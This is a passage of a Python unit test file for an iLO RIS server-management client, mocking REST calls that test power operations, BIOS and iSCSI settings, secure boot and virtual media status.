self.assertTrue(host_power_status_mock.called)
@mock.patch.object(ris.RISOperations, 'get_host_power_status')
def test_set_host_power_exc(self, host_power_status_mock):
self.assertRaises(exception.IloInvalidInputError,
self.client.set_host_power, 'invalid')
@mock.patch.object(ris.RISOperations, '_perform_power_op')
@mock.patch.object(ris.RISOperations, 'get_host_power_status')
@mock.patch.object(ris.RISOperations, 'get_product_name')
@mock.patch.object(ris.RISOperations, '_retry_until_powered_on')
def test_set_host_power_off_for_blade_servers(self, retry_mock,
product_mock,
host_power_status_mock,
perform_power_op_mock):
host_power_status_mock.return_value = 'ON'
product_mock.return_value = 'ProLiant BL460'
self.client.set_host_power('off')
host_power_status_mock.assert_called_once_with()
perform_power_op_mock.assert_called_once_with('ForceOff')
self.assertFalse(retry_mock.called)
@mock.patch.object(ris.RISOperations, '_perform_power_op')
@mock.patch.object(ris.RISOperations, 'get_host_power_status')
@mock.patch.object(ris.RISOperations, 'get_product_name')
@mock.patch.object(ris.RISOperations, '_retry_until_powered_on')
def test_set_host_power_on_for_blade_servers(self, retry_mock,
product_mock,
host_power_status_mock,
perform_power_op_mock):
host_power_status_mock.return_value = 'OFF'
product_mock.return_value = 'ProLiant BL460'
self.client.set_host_power('On')
host_power_status_mock.assert_called_once_with()
self.assertTrue(product_mock.called)
self.assertFalse(perform_power_op_mock.called)
self.assertTrue(retry_mock.called)
@mock.patch.object(ris.RISOperations, '_perform_power_op')
@mock.patch.object(ris.RISOperations, 'get_host_power_status')
@mock.patch.object(ris.RISOperations, '_retry_until_powered_on')
def test_set_host_power_off_for_non_blade_servers(
self, retry_mock, host_power_status_mock, perform_power_op_mock):
host_power_status_mock.return_value = 'ON'
self.client.set_host_power('off')
host_power_status_mock.assert_called_once_with()
perform_power_op_mock.assert_called_once_with('ForceOff')
self.assertFalse(retry_mock.called)
@mock.patch.object(ris.RISOperations, '_perform_power_op')
@mock.patch.object(ris.RISOperations, 'get_host_power_status')
@mock.patch.object(ris.RISOperations, 'get_product_name')
@mock.patch.object(ris.RISOperations, '_retry_until_powered_on')
def test_set_host_power_on_for_non_blade_servers(
self, retry_mock, product_mock, host_power_status_mock,
perform_power_op_mock):
host_power_status_mock.return_value = 'OFF'
product_mock.return_value = 'ProLiant DL380'
self.client.set_host_power('On')
host_power_status_mock.assert_called_once_with()
self.assertTrue(product_mock.called)
self.assertTrue(perform_power_op_mock.called)
self.assertFalse(retry_mock.called)
@mock.patch.object(ris.RISOperations, '_perform_power_op')
@mock.patch.object(ris.RISOperations, 'get_host_power_status')
def test_retry_until_powered_on_3times(self, host_power_status_mock,
perform_power_mock):
host_power_status_mock.side_effect = ['OFF', 'OFF', 'ON']
self.client._retry_until_powered_on('ON')
self.assertEqual(3, host_power_status_mock.call_count)
@mock.patch.object(ris.RISOperations, '_perform_power_op')
@mock.patch.object(ris.RISOperations, 'get_host_power_status')
def test_retry_until_powered_on(self, host_power_status_mock,
perform_power_mock):
host_power_status_mock.return_value = 'ON'
self.client._retry_until_powered_on('ON')
self.assertEqual(1, host_power_status_mock.call_count)
@mock.patch.object(ris.RISOperations, '_perform_power_op')
def test_reset_server(self, mock_perform_power):
self.client.reset_server()
mock_perform_power.assert_called_once_with("ForceRestart")
@mock.patch.object(ris.RISOperations, '_press_pwr_btn')
def test_hold_pwr_btn(self, press_pwr_btn_mock):
self.client.hold_pwr_btn()
press_pwr_btn_mock.assert_called_once_with(pushType="PressAndHold")
@mock.patch.object(ris.RISOperations, '_press_pwr_btn')
def test_press_pwr_btn(self, press_pwr_btn_mock):
self.client.hold_pwr_btn()
press_pwr_btn_mock.assert_called_once_with(pushType="PressAndHold")
@mock.patch.object(ris.RISOperations, '_perform_power_op')
@mock.patch.object(ris.RISOperations, 'get_host_power_status')
def test_inject_nmi(self, get_power_status_mock,
perform_power_op_mock):
get_power_status_mock.return_value = 'ON'
self.client.inject_nmi()
get_power_status_mock.assert_called_once_with()
perform_power_op_mock.assert_called_once_with('Nmi')
@mock.patch.object(ris.RISOperations, '_perform_power_op')
@mock.patch.object(ris.RISOperations, 'get_host_power_status')
def test_inject_nmi_exc(self, get_power_status_mock,
perform_power_op_mock):
get_power_status_mock.return_value = 'OFF'
self.assertRaises(exception.IloError,
self.client.inject_nmi)
get_power_status_mock.assert_called_once_with()
self.assertFalse(perform_power_op_mock.called)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_host_post_state(self, get_details_mock):
host_response = ris_outputs.RESPONSE_BODY_FOR_REST_OP
expected = 'PowerOff'
get_details_mock.return_value = json.loads(host_response)
result = self.client.get_host_post_state()
self.assertEqual(expected, result)
get_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test_get_host_post_state_exc(self, get_details_mock):
host_response = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
get_details_mock.return_value = host_response
del host_response['Oem']['Hp']['PostState']
self.assertRaises(exception.IloError,
self.client.get_host_post_state)
get_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_current_bios_settings_filter_true(self, check_bios_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
settings.pop("links", None)
expected_value = {k: settings[k] for k in (
constants.SUPPORTED_BIOS_PROPERTIES) if k in settings}
actual_value = self.client.get_current_bios_settings(True)
check_bios_mock.assert_called_once_with()
self.assertEqual(actual_value, expected_value)
@mock.patch.object(utils, 'apply_bios_properties_filter')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_current_bios_settings_filter_false(self, check_bios_mock,
bios_filter_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
settings.pop("links", None)
actual_value = self.client.get_current_bios_settings(False)
check_bios_mock.assert_called_once_with()
bios_filter_mock.assert_not_called()
self.assertEqual(actual_value, settings)
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_pending_bios_settings_no_links(self, check_bios_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
settings.pop("links", None)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client.get_pending_bios_settings, False)
check_bios_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_extended_error')
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_pending_bios_settings_filter_true(self, check_bios_mock,
get_mock, get_ext_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
settings_uri = "/rest/v1/systems/1/bios/Settings"
pending_settings = json.loads(ris_outputs.GET_BIOS_PENDING_SETTINGS)
pending_settings.pop("Description", None)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
pending_settings)
expected_value = {k: pending_settings[k] for k in (
constants.SUPPORTED_BIOS_PROPERTIES) if k in pending_settings}
actual_value = self.client.get_pending_bios_settings(True)
self.assertEqual(actual_value, expected_value)
get_mock.assert_called_once_with(settings_uri)
check_bios_mock.assert_called_once_with()
@mock.patch.object(utils, 'apply_bios_properties_filter')
@mock.patch.object(ris.RISOperations, '_get_extended_error')
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_pending_bios_settings_filter_false(self, check_bios_mock,
get_mock, get_ext_mock,
bios_filter_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
settings_uri = "/rest/v1/systems/1/bios/Settings"
pending_settings = json.loads(ris_outputs.GET_BIOS_PENDING_SETTINGS)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
pending_settings)
actual_value = self.client.get_pending_bios_settings(False)
self.assertEqual(actual_value, pending_settings)
get_mock.assert_called_once_with(settings_uri)
check_bios_mock.assert_called_once_with()
bios_filter_mock.assert_not_called()
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_default_bios_settings_filter_true(self, check_bios_mock,
rest_get_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
base_config = json.loads(ris_outputs.GET_BASE_CONFIG)
rest_get_mock.return_value = (200, 'HEADERS', base_config)
default_settings = None
for cfg in base_config['BaseConfigs']:
default_settings = cfg.get('default', None)
if default_settings is not None:
break
expected_value = {k: default_settings[k] for k in (
constants.SUPPORTED_BIOS_PROPERTIES) if k in default_settings}
actual_value = self.client.get_default_bios_settings(True)
check_bios_mock.assert_called_once_with()
rest_get_mock.assert_called_once_with(
"/rest/v1/systems/1/bios/BaseConfigs")
self.assertEqual(expected_value, actual_value)
@mock.patch.object(utils, 'apply_bios_properties_filter')
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_default_bios_settings_filter_false(
self, check_bios_mock, rest_get_mock, filter_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
base_config = json.loads(ris_outputs.GET_BASE_CONFIG)
rest_get_mock.return_value = (200, 'HEADERS', base_config)
default_settings = None
for cfg in base_config['BaseConfigs']:
default_settings = cfg.get('default', None)
if default_settings is not None:
break
expected_value = default_settings
actual_value = self.client.get_default_bios_settings(False)
check_bios_mock.assert_called_once_with()
rest_get_mock.assert_called_once_with(
"/rest/v1/systems/1/bios/BaseConfigs")
self.assertEqual(expected_value, actual_value)
filter_mock.assert_not_called()
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_default_bios_settings_no_links(self, check_bios_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
settings.pop("links", None)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client.get_default_bios_settings, False)
check_bios_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_extended_error')
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_default_bios_settings_check_extended_error(
self, check_bios_mock, rest_get_mock, ext_err_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
base_config = json.loads(ris_outputs.GET_BASE_CONFIG)
rest_get_mock.return_value = (201, 'HEADERS', base_config)
self.assertRaises(exception.IloError,
self.client.get_default_bios_settings, False)
check_bios_mock.assert_called_once_with()
ext_err_mock.assert_called_once_with(base_config)
@mock.patch.object(utils, 'apply_bios_properties_filter')
@mock.patch.object(ris.RISOperations, '_get_extended_error')
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test_get_default_bios_settings_no_default_settings(
self, check_bios_mock, rest_get_mock, ext_err_mock, filter_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
base_config = json.loads(ris_outputs.GET_BASE_CONFIG)
default_val = base_config["BaseConfigs"][0].pop("default")
base_config["BaseConfigs"][0]["no_default"] = default_val
rest_get_mock.return_value = (200, 'HEADERS', base_config)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client.get_default_bios_settings, False)
check_bios_mock.assert_called_once_with()
ext_err_mock.assert_not_called()
filter_mock.assert_not_called()
@mock.patch.object(utils, 'apply_bios_properties_filter')
@mock.patch.object(ris.RISOperations, '_change_bios_setting')
def test_set_bios_settings_no_data_apply_filter(self, change_bios_mock,
filter_mock):
apply_filter = True
data = None
self.client.set_bios_settings(data, apply_filter)
change_bios_mock.assert_not_called()
filter_mock.assert_not_called()
@mock.patch.object(utils, 'apply_bios_properties_filter')
@mock.patch.object(ris.RISOperations, '_change_bios_setting')
def test_set_bios_settings_no_data_no_filter(self, change_bios_mock,
filter_mock):
apply_filter = False
data = None
self.client.set_bios_settings(data, apply_filter)
change_bios_mock.assert_not_called()
filter_mock.assert_not_called()
@mock.patch.object(utils, 'apply_bios_properties_filter')
@mock.patch.object(ris.RISOperations, '_change_bios_setting')
def test_set_bios_settings_filter_true(self, change_bios_mock,
filter_mock):
data = {
"AdminName": "Administrator",
"BootMode": "LEGACY",
"ServerName": "Gen9 server",
"TimeFormat": "Ist",
"BootOrderPolicy": "RetryIndefinitely",
"ChannelInterleaving": "Enabled",
"CollabPowerControl": "Enabled",
"ConsistentDevNaming": "LomsOnly",
"CustomPostMessage": ""
}
expected = {
"AdminName": "Administrator",
"BootMode": "LEGACY",
"ServerName": "Gen9 server",
"TimeFormat": "Ist",
"BootOrderPolicy": "RetryIndefinitely",
}
filter_mock.return_value = expected
apply_filter = True
self.client.set_bios_settings(data, apply_filter)
change_bios_mock.assert_called_once_with(expected)
filter_mock.assert_called_once_with(
data, constants.SUPPORTED_BIOS_PROPERTIES)
@mock.patch.object(utils, 'apply_bios_properties_filter')
@mock.patch.object(ris.RISOperations, '_change_bios_setting')
def test_set_bios_settings_filter_false(self, change_bios_mock,
filter_mock):
data = {
"AdminName": "Administrator",
"BootMode": "LEGACY",
"ServerName": "Gen9 server",
"TimeFormat": "Ist",
"BootOrderPolicy": "RetryIndefinitely",
"ChannelInterleaving": "Enabled",
"CollabPowerControl": "Enabled",
"ConsistentDevNaming": "LomsOnly",
"CustomPostMessage": ""
}
apply_filter = False
self.client.set_bios_settings(data, apply_filter)
change_bios_mock.assert_called_once_with(data)
filter_mock.assert_not_called()
class TestRISOperationsPrivateMethods(testtools.TestCase):
def setUp(self):
super(TestRISOperationsPrivateMethods, self).setUp()
self.client = ris.RISOperations("1.2.3.4", "admin", "Admin")
@mock.patch.object(ris.RISOperations, 'get_current_boot_mode')
def test__is_boot_mode_uefi_uefi(self, get_current_boot_mode_mock):
get_current_boot_mode_mock.return_value = 'UEFI'
result = self.client._is_boot_mode_uefi()
self.assertTrue(result)
@mock.patch.object(ris.RISOperations, 'get_current_boot_mode')
def test__is_boot_mode_uefi_bios(self, get_current_boot_mode_mock):
get_current_boot_mode_mock.return_value = 'LEGACY'
result = self.client._is_boot_mode_uefi()
self.assertFalse(result)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test___change_bios_setting(self, check_bios_mock, patch_mock):
bios_uri = '/rest/v1/systems/1/bios'
properties = {'fake-property': 'fake-value'}
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client._change_bios_setting(properties)
check_bios_mock.assert_called_once_with(properties.keys())
patch_mock.assert_called_once_with(bios_uri, {}, properties)
@mock.patch.object(ris.RISOperations, '_validate_if_patch_supported')
@mock.patch.object(ris.RISOperations, '_operation_allowed')
@mock.patch.object(ris.RISOperations, '_get_bios_settings_resource')
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test___change_bios_setting_fail(self, check_bios_mock, patch_mock,
settings_mock, op_mock,
validate_mock):
bios_uri = '/rest/v1/systems/1/bios/Settings'
properties = {'fake-property': 'fake-value'}
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
op_mock.return_value = False
settings_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.assertRaises(exception.IloError,
self.client._change_bios_setting,
properties)
check_bios_mock.assert_called_once_with(properties.keys())
op_mock.assert_called_once_with(ris_outputs.GET_HEADERS, 'PATCH')
settings_mock.assert_called_once_with(settings)
patch_mock.assert_called_once_with(bios_uri, {}, properties)
@mock.patch.object(ris.RISOperations, '_validate_if_patch_supported')
@mock.patch.object(ris.RISOperations, '_get_iscsi_settings_resource')
@mock.patch.object(ris.RISOperations, '_operation_allowed')
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__check_iscsi_rest_patch_allowed(self, check_bios_mock, get_mock,
op_mock, settings_mock,
validate_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
iscsi_uri = '/rest/v1/systems/1/bios/iScsi'
iscsi_settings = json.loads(ris_outputs.GET_ISCSI_SETTINGS)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
iscsi_settings)
op_mock.return_value = False
iscsi_settings_uri = '/rest/v1/systems/1/bios/iScsi/Settings'
settings_mock.return_value = (ris_outputs.GET_HEADERS,
iscsi_settings_uri, iscsi_settings)
self.client._check_iscsi_rest_patch_allowed()
check_bios_mock.assert_called_once_with()
get_mock.assert_called_once_with(iscsi_uri)
op_mock.assert_called_once_with(ris_outputs.GET_HEADERS, 'PATCH')
settings_mock.assert_called_once_with(iscsi_settings)
validate_mock.assert_called_once_with(ris_outputs.GET_HEADERS,
iscsi_settings_uri)
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__check_iscsi_rest_patch_allowed_fail(self, check_bios_mock,
get_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
iscsi_uri = '/rest/v1/systems/1/bios/iScsi'
iscsi_settings = json.loads(ris_outputs.GET_ISCSI_SETTINGS)
get_mock.return_value = (202, ris_outputs.GET_HEADERS,
iscsi_settings)
self.assertRaises(exception.IloError,
self.client._check_iscsi_rest_patch_allowed)
check_bios_mock.assert_called_once_with()
get_mock.assert_called_once_with(iscsi_uri)
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__check_iscsi_rest_patch_allowed_not_found(self, check_bios_mock):
bios_uri = '/rest/v1/systems/1/bios'
settings = json.loads(ris_outputs.GET_BASE_CONFIG)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, settings)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client._check_iscsi_rest_patch_allowed)
check_bios_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_check_iscsi_rest_patch_allowed')
@mock.patch.object(ris.RISOperations, '_get_bios_mappings_resource')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__change_iscsi_settings(self, check_bios_mock,
mappings_mock, check_iscsi_mock,
patch_mock):
bios_uri = '/rest/v1/systems/1/bios'
bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, bios_settings)
map_settings = json.loads(ris_outputs.GET_BIOS_MAPPINGS)
mappings_mock.return_value = map_settings
iscsi_uri = '/rest/v1/systems/1/bios/iScsi/Settings'
properties = {'iSCSITargetName':
'iqn.2011-07.com.example.server:test1',
'iSCSIBootLUN': '1',
'iSCSITargetIpAddress': '10.10.1.30',
'iSCSITargetTcpPort': 3260}
settings = json.loads(ris_outputs.GET_ISCSI_PATCH)
check_iscsi_mock.return_value = iscsi_uri
patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client._change_iscsi_settings(properties)
check_bios_mock.assert_called_once_with()
mappings_mock.assert_called_once_with(bios_settings)
check_iscsi_mock.assert_called_once_with()
patch_mock.assert_called_once_with(iscsi_uri, None, settings)
@mock.patch.object(ris.RISOperations, '_get_bios_mappings_resource')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__change_iscsi_settings_without_nic(self, check_bios_mock,
mappings_mock):
bios_uri = '/rest/v1/systems/1/bios'
bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, bios_settings)
map_settings = json.loads(ris_outputs.GET_BIOS_MAPPINGS_WITHOUT_NIC)
mappings_mock.return_value = map_settings
self.assertRaises(exception.IloError,
self.client._change_iscsi_settings,
{})
check_bios_mock.assert_called_once_with()
mappings_mock.assert_called_once_with(bios_settings)
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_check_iscsi_rest_patch_allowed')
@mock.patch.object(ris.RISOperations, '_get_bios_mappings_resource')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__change_iscsi_settings_fail(self, check_bios_mock,
mappings_mock, check_iscsi_mock,
patch_mock):
bios_uri = '/rest/v1/systems/1/bios'
bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, bios_settings)
map_settings = json.loads(ris_outputs.GET_BIOS_MAPPINGS)
mappings_mock.return_value = map_settings
iscsi_uri = '/rest/v1/systems/1/bios/iScsi/Settings'
properties = {'iSCSITargetName':
'iqn.2011-07.com.example.server:test1',
'iSCSIBootLUN': '1',
'iSCSITargetIpAddress': '10.10.1.30',
'iSCSITargetTcpPort': 3260}
settings = json.loads(ris_outputs.GET_ISCSI_PATCH)
check_iscsi_mock.return_value = iscsi_uri
patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.assertRaises(exception.IloError,
self.client._change_iscsi_settings,
properties)
check_bios_mock.assert_called_once_with()
mappings_mock.assert_called_once_with(bios_settings)
check_iscsi_mock.assert_called_once_with()
patch_mock.assert_called_once_with(iscsi_uri, None, settings)
@mock.patch.object(ris.RISOperations, '_change_bios_setting')
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test___change_secure_boot_settings(self, get_details_mock, patch_mock,
get_bios_mock, change_bios_mock):
host_details = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
get_details_mock.return_value = host_details
get_bios_mock.return_value = "test"
secure_boot_uri = '/rest/v1/Systems/1/SecureBoot'
bios_dict = {'CustomPostMessage': 'test '}
patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client._change_secure_boot_settings('fake-property',
'fake-value')
get_details_mock.assert_called_once_with()
patch_mock.assert_called_once_with(secure_boot_uri, None,
{'fake-property': 'fake-value'})
get_bios_mock.assert_called_once_with('CustomPostMessage')
change_bios_mock.assert_called_once_with(bios_dict)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test___change_secure_boot_settings_not_supported(self,
get_details_mock):
host_response = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
del host_response['Oem']['Hp']['links']['SecureBoot']
get_details_mock.return_value = host_response
self.assertRaises(exception.IloCommandNotSupportedError,
self.client._change_secure_boot_settings,
'fake-property', 'fake-value')
get_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_rest_patch')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test___change_secure_boot_settings_fail(self, get_details_mock,
patch_mock):
host_details = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
get_details_mock.return_value = host_details
secure_boot_uri = '/rest/v1/Systems/1/SecureBoot'
patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
ris_outputs.REST_FAILURE_OUTPUT)
self.assertRaises(exception.IloError,
self.client._change_secure_boot_settings,
'fake-property', 'fake-value')
get_details_mock.assert_called_once_with()
patch_mock.assert_called_once_with(secure_boot_uri, None,
{'fake-property': 'fake-value'})
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__get_bios_setting(self, bios_mock):
bios_mock.return_value = ('fake', 'fake',
json.loads(ris_outputs.GET_BIOS_SETTINGS))
result = self.client._get_bios_setting('BootMode')
bios_mock.assert_called_once_with(['BootMode'])
self.assertEqual(result, 'Uefi')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_bios_settings_resource(self, get_mock):
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
settings)
self.client._get_bios_settings_resource(settings)
get_mock.assert_called_once_with('/rest/v1/systems/1/bios/Settings')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_bios_settings_resource_key_error(self, get_mock):
settings = json.loads(ris_outputs.GET_BASE_CONFIG)
self.assertRaises(exception.IloError,
self.client._get_bios_settings_resource,
settings)
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_bios_settings_resource_fail(self, get_mock):
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
settings_uri = '/rest/v1/systems/1/bios/Settings'
get_mock.return_value = (301, ris_outputs.GET_HEADERS,
settings)
self.assertRaises(exception.IloError,
self.client._get_bios_settings_resource,
settings)
get_mock.assert_called_once_with(settings_uri)
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_bios_boot_resource(self, get_mock):
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
boot_settings = json.loads(ris_outputs.GET_BIOS_BOOT)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
boot_settings)
self.client._get_bios_boot_resource(settings)
get_mock.assert_called_once_with('/rest/v1/systems/1/bios/Boot')
def test__get_bios_boot_resource_key_error(self):
settings = json.loads(ris_outputs.GET_BASE_CONFIG)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client._get_bios_boot_resource,
settings)
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_bios_boot_resource_fail(self, get_mock):
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
boot_settings = json.loads(ris_outputs.GET_BIOS_BOOT)
get_mock.return_value = (201, ris_outputs.GET_HEADERS,
boot_settings)
self.assertRaises(exception.IloError,
self.client._get_bios_boot_resource,
settings)
get_mock.assert_called_once_with('/rest/v1/systems/1/bios/Boot')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_bios_mappings_resource(self, get_mock):
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
map_settings = json.loads(ris_outputs.GET_BIOS_MAPPINGS)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
map_settings)
self.client._get_bios_mappings_resource(settings)
get_mock.assert_called_once_with('/rest/v1/systems/1/bios/Mappings')
def test__get_bios_mappings_resource_key_error(self):
settings = json.loads(ris_outputs.GET_BASE_CONFIG)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client._get_bios_mappings_resource,
settings)
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_bios_mappings_resource_fail(self, get_mock):
settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
map_settings = json.loads(ris_outputs.GET_BIOS_MAPPINGS)
get_mock.return_value = (201, ris_outputs.GET_HEADERS,
map_settings)
self.assertRaises(exception.IloError,
self.client._get_bios_mappings_resource,
settings)
get_mock.assert_called_once_with('/rest/v1/systems/1/bios/Mappings')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_iscsi_settings_resource(self, get_mock):
settings = json.loads(ris_outputs.GET_ISCSI_SETTINGS)
get_mock.return_value = (200, ris_outputs.GET_HEADERS, settings)
self.client._get_iscsi_settings_resource(settings)
get_mock.assert_called_once_with(
'/rest/v1/systems/1/bios/iScsi/Settings')
def test__get_iscsi_settings_resource_key_error(self):
settings = json.loads(ris_outputs.GET_ISCSI_PATCH)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client._get_iscsi_settings_resource,
settings)
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_iscsi_settings_resource_fail(self, get_mock):
settings = json.loads(ris_outputs.GET_ISCSI_SETTINGS)
get_mock.return_value = (201, ris_outputs.GET_HEADERS, settings)
self.assertRaises(exception.IloError,
self.client._get_iscsi_settings_resource,
settings)
get_mock.assert_called_once_with(
'/rest/v1/systems/1/bios/iScsi/Settings')
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
@mock.patch.object(ris.RISOperations, '_get_collection')
def test__get_vm_device_status(self,
collection_mock,
ilo_details_mock,
get_mock):
manager_uri = '/rest/v1/Managers/1'
manager_data = json.loads(ris_outputs.GET_MANAGER_DETAILS)
ilo_details_mock.return_value = (manager_data, manager_uri)
collection_item = json.loads(ris_outputs.RESP_VM_STATUS_FLOPPY_EMPTY)
vmedia_uri = '/rest/v1/Managers/1/VirtualMedia'
member_uri = '/rest/v1/Managers/1/VirtualMedia/1'
collection_mock.return_value = [(200, None, collection_item,
member_uri)]
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
collection_item)
self.client._get_vm_device_status('FLOPPY')
ilo_details_mock.assert_called_once_with()
collection_mock.assert_called_once_with(vmedia_uri)
get_mock.assert_called_once_with(member_uri)
